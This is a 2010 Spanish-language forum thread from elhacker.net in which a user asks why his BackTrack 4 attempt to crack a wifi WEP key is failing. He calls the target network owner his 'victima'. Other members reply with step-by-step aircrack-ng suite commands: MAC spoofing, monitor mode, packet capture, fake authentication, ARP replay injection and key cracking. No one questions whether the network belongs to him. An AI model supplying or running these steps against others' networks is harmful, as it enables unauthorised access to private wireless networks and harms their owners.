Foro de elhacker.net

Seguridad Informática => Wireless en Linux => Mensaje iniciado por: Jomaruiz en 14 Junio 2010, 12:46 pm



Título: 128000 paketes con back track 4 y nada
Publicado por: Jomaruiz en 14 Junio 2010, 12:46 pm
Hola, buenas a todos, tengo un problemilla con backtrack 4.

Lo ejecuto desde el cd live, y cuando pongo el tercer comando de aireplay-ng cuando lleva muchas horas al final en la primera ventana donde coje los paquetes con el aridomp-ng zxxxxxxxxxxxxxxxxxx wlano me aparece un error como que no hay mas memoria y una ventana de ejecutar un programa.

Bien pues ayer empece el tercer paso cuando ya llevaba 40.000 paketes cual es mi sorpresa hoy que llevaba mas de 120 mil y todavía no me ha descifrado la Key de la red wifi.

Alguien sabe porque?

Saludos


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: xv0 en 14 Junio 2010, 12:54 pm
Buenas, puedes pegar el error que te da el airodump, tienes 128.000 si no son validos no te valen para nada.

Un saludo


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: Jomaruiz en 14 Junio 2010, 13:12 pm
Lo siento, no puedo pegarlo, como he dicho lo hago desde el cd live, que info quieres saver haber si puedo ponertela

Saludos


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: xv0 en 14 Junio 2010, 13:18 pm
Lo siento, no puedo pegarlo, como he dicho lo hago desde el cd live
Papel y boli xD
que info quieres saber haber si puedo ponertela
No soy adivino

Un saludo


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: Jomaruiz en 14 Junio 2010, 13:22 pm
jeje, ok lo volveré hacer y te lo pondré todo


Saludos


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: Jomaruiz en 14 Junio 2010, 16:40 pm
Vale dentro ya de backtrack

Abro la 1ª ventana y pongo airodump-ng wlan0
Ctrl + c y escribo
airodump-ng -w wep -c 1 --bssid XX:XX:XX:XX:XX:XX wlan0
(bssid el de mi victima)
y empieza a captar Datas / paquetes

Abro la segunda ventana, aveces nada mas hacer el paso anterior, aveces me espero a que tenga 20 o 30 mil apaquetes puesto que si no me sale el error de la memoria.

y escribo aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX wlan0
me sale al final AID: 1)
y escribo aireplay-ng -3 -b XX:XX:XX:XX:XX:XX wlan0
y empieza a inyectar paquetes.

Abro la 3ª ventana y pongo aircrack-ng wep-01.cap
y empieza hacer el descifrado, de mometno siempre me ha dicho que vaya provando con 5 mil mas.

Saludos


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: Jomaruiz en 14 Junio 2010, 18:10 pm
Acaso nadie me responde porque lo hago bien?

Saludos


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: xv0 en 15 Junio 2010, 00:04 am
Acaso nadie me responde porque lo hago bien?

Saludos
Buenas, diciendo eso lo que consigues es que la gente no te kiera ayudar, nadie esta obligado a contestarte.

Abro la 1ª ventana y pongo airodump-ng wlan0
Ctrl + c y escribo
airodump-ng -w wep -c 1 --bssid XX:XX:XX:XX:XX:XX wlan0
(bssid el de mi victima)
y empieza a captar Datas / paquetes

Abro la segunda ventana, aveces nada mas hacer el paso anterior, aveces me espero a que tenga 20 o 30 mil apaquetes puesto que si no me sale el error de la memoria.

y escribo aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX wlan0
me sale al final AID: 1)
y escribo aireplay-ng -3 -b XX:XX:XX:XX:XX:XX wlan0
y empieza a inyectar paquetes.

Abro la 3ª ventana y pongo aircrack-ng wep-01.cap
y empieza hacer el descifrado, de mometno siempre me ha dicho que vaya provando con 5 mil mas.
Bueno los pasos que sigues no es que sean de los mejores, se puede hacer mejor, cambiaste la mac de tu tarjeta? dices que corren paquetes miraste si hay un cliente (abajo de la pantalla de airodump) prueba con estos pasos:

Código:
ifconfig wlan0 down
Código:
ifconfig wlan0 hw ether 00:11:22:33:44:55
Con eso cambias la mac de tu tarjeta por 00:11:22:33:44:55 por si kieres hacerle una inyecion falsa, tambien por seguridad mejor que vean eso que no tu mac verdadera.
Código:
iwconfig wlan0 mode monitor
Ponemos la tarjeta modo monitor
Código:
ifconfig wlan0 up
Levantamos la tarjeta, esta lista.
Vale el commando de airodump esta bien pero los de aireplay nose nose prueba con esto:
Código:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
aver en -h 00:11:22:33:44:55 le dices que el cliente seas tu, pero si dices que corren los datas seguro que hay un cliente, si lo hay no pongas 00:11:22:33:44:55 pon la mac que sale en airodump, otra cosa fijate si en la pantalla de airodump en AUTH pone OPEN si no pone open esos paquetes no se podran leer.
Código:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
Espera a que inyecte, si no prueba otro ataque aqui los tienes:
Código:
aireplay-ng --help
Si es una red de timofonica son de 128 bits yo las caso con unos 50.000:
Código:
aircrack-ng -z *.cap
Le dices que opcion kieres y ya esta.

Un saludo



Título: Re: 128000 paketes con back track 4 y nada
Publicado por: Jomaruiz en 15 Junio 2010, 12:48 pm
Gracias x contestar y perdón por ser un poco impaciente, pero llevo con esto mas de un mes y solo hago que leer en manuales que es muy sencillo, no quería dar prisas a nadie, simplemente saver si lo estaba haciendo bien.

Pido disculpas

Bueno voy a seguir tus pasos y consejos haber si tengo mas suerte.

Muchas gracias


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: Jomaruiz en 15 Junio 2010, 17:51 pm
Bunas, pues veran no me va muy bien los comandos que tu me pones

En: ifconfig wlan0 hw ether 00:11:22:33:44:55 me sale este error SIOCSIFHWADDR: invalid argument

En: iwfonfig wlan0 mode monitor me sale este error mode: Unknow host

Y donde me dices que en AUTH tiene que poner Open, en algunas no pone nada y en otras pone PSK, en ninguna Opn

Saluds


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: xv0 en 16 Junio 2010, 01:20 am
Buenas, estas seguro de que los commandos no funcionan bien? ami si que me funcionan, pon esto
Código:
iwconfig
y asegurate de que tu interfaz en wlan0 no otro, si no te aclaras con ifconfig siempre te keda macchanger.
Y donde me dices que en AUTH tiene que poner Open, en algunas no pone nada y en otras pone PSK, en ninguna Opn
Lo de OPEN lo tiene que poner cuando haces el
Código:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0

Un saludo


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: heaviloto en 16 Junio 2010, 01:34 am
hola,

solo hago que leer en manuales que es muy sencillo,

deberias seguir leyendo, es importante saber lo que haces en cada momento y no solo abrir consolas y poner comandos

un saludo


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: Jomaruiz en 16 Junio 2010, 09:58 am
Buenos días, el comando

macchanger si que me funciona bien

y si si que es wlan0, estoy seguro, ademas el ifconfig también me sale bien.

Me he traído el portátil a la oficina para hacer los pasos uno a uno y ir posteando los errores.


Saludos


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: Jomaruiz en 16 Junio 2010, 10:33 am
En el comando aireplay, que es para inyectar trafico y que asi la captura de paquetes vaya mas rapida, todos los pasos me salen bien, pero la verdad no va nada rapido, en 16 minutos 3 paquetes?????

Otra cosa en la ventana de aireplay corren mucho los paquetes pero sin embargo lo que esta entre parentesis (got 0 ARP request and 9 ACKs), sent 9 paqcket ... (0pps)
Esto no deberia tambien de correr, se me a quedado en cero.

Pero en el paso anteiror de aireplay me salisa Association Succesful :-) (AID: 1)


No lo entiendo


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: ChimoC en 16 Junio 2010, 12:28 pm
Buenas:

Un A3 (inyección) sobre un A1 (asociación falsa) a veces tarda HORASSSSSS, otras minutos... y otras directamente NO funciona

Tu NO estas inyectando

Prueba A1+A2+A3

Un saludo

ChimoC


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: Jomaruiz en 16 Junio 2010, 13:30 pm
Hola ChimoC, gracias por contestar e intentar ayudarme, pero perdóname por mi ignorancia pero no entiendo que es lo de

A1
A2
A3

Saludos


Título: Re: 128000 paketes con back track 4 y nada
Publicado por: heaviloto en 16 Junio 2010, 15:20 pm
hola,

insisto, deberias leer un poco mas, o mejor

Hola ChimoC, gracias por contestar e intentar ayudarme, pero perdóname por mi ignorancia pero no entiendo que es lo de

A1=Autentificación falsa (aireplay-ng -1 30 -o 1 -e (nombre bssid) -a aa:bb:cc:dd:ee:ff -h  (Mac de nuestra tarjeta) wlan0 ))

A2=Selección interactiva del paquete a enviar (aireplay-ng -2 –p 0841 –c ff:ff:ff:ff:ff:ff –b (bssid del Ap) –h (nuestra bssid o la del cliente) wlan0)

A3=Reinyección de petición ARP (aireplay-ng -3 -b  aa:bb:cc:dd:ee:ff -h  00:11:22:33:44:55 wlan0)

Saludos


un saludo